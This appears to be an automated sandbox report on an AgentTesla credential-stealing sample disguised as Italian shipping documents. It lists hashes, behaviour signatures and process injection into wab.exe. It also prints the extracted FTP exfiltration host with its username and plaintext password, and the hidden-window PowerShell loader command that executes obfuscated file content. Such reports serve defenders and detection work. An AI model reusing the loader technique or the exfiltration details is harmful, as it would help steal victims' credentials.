Analysis
-
max time kernel
143s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-09-2024 01:02
Static task
static1
Behavioral task
behavioral1
Sample
Documenti di spedizione 0002838844.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Documenti di spedizione 0002838844.exe
Resource
win10v2004-20240802-en
General
-
Target
Documenti di spedizione 0002838844.exe
-
Size
695KB
-
MD5
2505793cd3edee5e7ceab9359a8a74ba
-
SHA1
30437e6082392072f27fd3609e6aac5d161c45a8
-
SHA256
8cce7f3f93f7d317da18beb13332f1ad601c4552022d07d7e28d1d836eedba81
-
SHA512
58f4dd9082ed1b7721030f1f7ac74bdb7878153081839d13ebf0027ea9d47cfb198d9cad97645b915a981442716979b7ef48e751e13f69f0a7bcf7e0aab2a2ba
-
SSDEEP
6144:JpkXchsEnW7+8WIEZb8Qj+iHK5sDlK+f+gsw8XuMEbHdLP7LoMg//YgNfegoWK2E:YvWIKbnKiHEsM60Z/Y8emeFFwP0nRUq
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2748 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 api.ipify.org 6 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2612 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2748 powershell.exe 2612 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2748 set thread context of 2612 2748 powershell.exe 33 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Documenti di spedizione 0002838844.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2612 wab.exe 2612 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2612 wab.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2652 wrote to memory of 2748 2652 Documenti di spedizione 0002838844.exe 30 PID 2652 wrote to memory of 2748 2652 Documenti di spedizione 0002838844.exe 30 PID 2652 wrote to memory of 2748 2652 Documenti di spedizione 0002838844.exe 30 PID 2652 wrote to memory of 2748 2652 Documenti di spedizione 0002838844.exe 30 PID 2748 wrote to memory of 2612 2748 powershell.exe 33 PID 2748 wrote to memory of 2612 2748 powershell.exe 33 PID 2748 wrote to memory of 2612 2748 powershell.exe 33 PID 2748 wrote to memory of 2612 2748 powershell.exe 33 PID 2748 wrote to memory of 2612 2748 powershell.exe 33 PID 2748 wrote to memory of 2612 2748 powershell.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione 0002838844.exe"C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione 0002838844.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$sharping=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Segment.Sam';$qatars=$sharping.SubString(43606,3);.$qatars($sharping)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
314KB
MD52b5e89cf7067591109b0a73fa6d9973d
SHA1e924969e07bd57b5c6ac1a4a1d20928b666804a0
SHA256ef05ff4d95cfb33089e1d6aede4157989fee552e6e0e59fd653300876bc32d14
SHA51211905db895f3b2a764fa96d4b01ff18d29032b36ac1da1312e6e0f20749c8287f552b26a37f4e054041081c341b8c472b90bf7185c04b2fc61b88b23427c11a7
-
Filesize
53KB
MD5bc4900725d3d13feb8409643ec5b42a8
SHA113e40afed666594caf9bfee6f07f4bc9039c04e7
SHA2566741b125848e3a2ec6665e467bf819de8d9dd0a7cddd5642bcc64f6acadd8dc8
SHA512732b2751117b41979c216685aa4211453e180c641fa85cac2a76ce56e802734a3257dddd3731c5801c0c1063ed933f9e89be7a956b586051cde5d3ff940518d1